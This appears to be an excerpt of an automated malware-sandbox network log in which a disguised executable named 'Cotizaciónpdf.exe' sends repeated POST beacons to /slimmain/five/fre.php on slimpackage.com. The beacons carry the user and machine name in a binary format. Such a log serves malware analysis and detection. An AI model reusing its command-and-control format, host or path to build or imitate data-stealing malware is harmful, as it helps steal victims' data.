Jan 14, 2022 17:28:21.723001003 CET	1237	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:20 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.5	49834	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:36.420886040 CET	9935	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:36.630243063 CET	9935	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:36.768083096 CET	9935	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:35 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.5	49835	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:37.798758984 CET	9936	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:37.929960012 CET	9937	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:38.068783998 CET	9937	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:37 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.5	49836	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:39.184763908 CET	9938	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:39.325314999 CET	9938	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:39.474395990 CET	9938	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:38 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.5	49837	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:40.528047085 CET	9939	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:40.659979105 CET	9939	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:40.801172972 CET	9940	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:39 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.5	49838	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:41.926429987 CET	9941	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:42.054831028 CET	9941	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:42.200709105 CET	9941	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:41 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.5	49839	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:43.436918974 CET	9942	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:43.567903996 CET	9942	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:43.706233025 CET	9943	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:42 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.5	49840	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:44.869754076 CET	9943	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:45.001187086 CET	9944	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:45.142271042 CET	9944	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:44 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.5	49841	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:46.912807941 CET	9945	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:47.042817116 CET	9945	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:47.179666996 CET	9945	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:46 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.5	49843	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:51.162188053 CET	9955	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:51.379081011 CET	9955	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:51.567084074 CET	9955	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:50 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.5	49844	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:53.715307951 CET	9956	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:53.843499899 CET	9956	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:54.062087059 CET	9957	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:52 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49763	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:23.258656025 CET	1238	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:23.389926910 CET	1238	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:23.530498028 CET	1238	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:22 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.5	49845	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:55.732333899 CET	9958	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:55.863666058 CET	9958	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:56.001481056 CET	9958	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:55 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.5	49848	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:29:57.571676016 CET	9969	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:29:57.702625990 CET	9971	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:29:57.842660904 CET	9972	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:56 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.5	49850	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:30:00.627162933 CET	9973	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:30:00.795773983 CET	9973	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:30:00.945791006 CET	9973	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:29:59 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.5	49851	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:30:02.041045904 CET	9974	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:30:02.205429077 CET	9974	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:30:02.345097065 CET	9975	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:30:01 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.5	49852	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:30:03.405898094 CET	9975	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:30:03.537081957 CET	9976	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:30:03.689683914 CET	9976	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:30:02 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.5	49853	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:30:04.852682114 CET	9977	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:30:04.985002041 CET	9977	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:30:05.125155926 CET	9977	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:30:04 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.5	49854	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:30:06.441231966 CET	9978	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:30:06.623379946 CET	9979	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:30:06.788499117 CET	9979	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:30:05 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.5	49855	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:30:08.079184055 CET	9980	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:30:08.386858940 CET	9980	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:30:08.526288986 CET	9980	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:30:07 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.5	49856	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:30:10.025450945 CET	9981	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:30:10.165288925 CET	9981	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:30:10.304357052 CET	9982	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:30:09 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49764	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:24.754729986 CET	1239	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:24.882812977 CET	1239	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:25.029998064 CET	1240	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:24 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49765	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:26.095199108 CET	1241	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:26.226634026 CET	1241	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
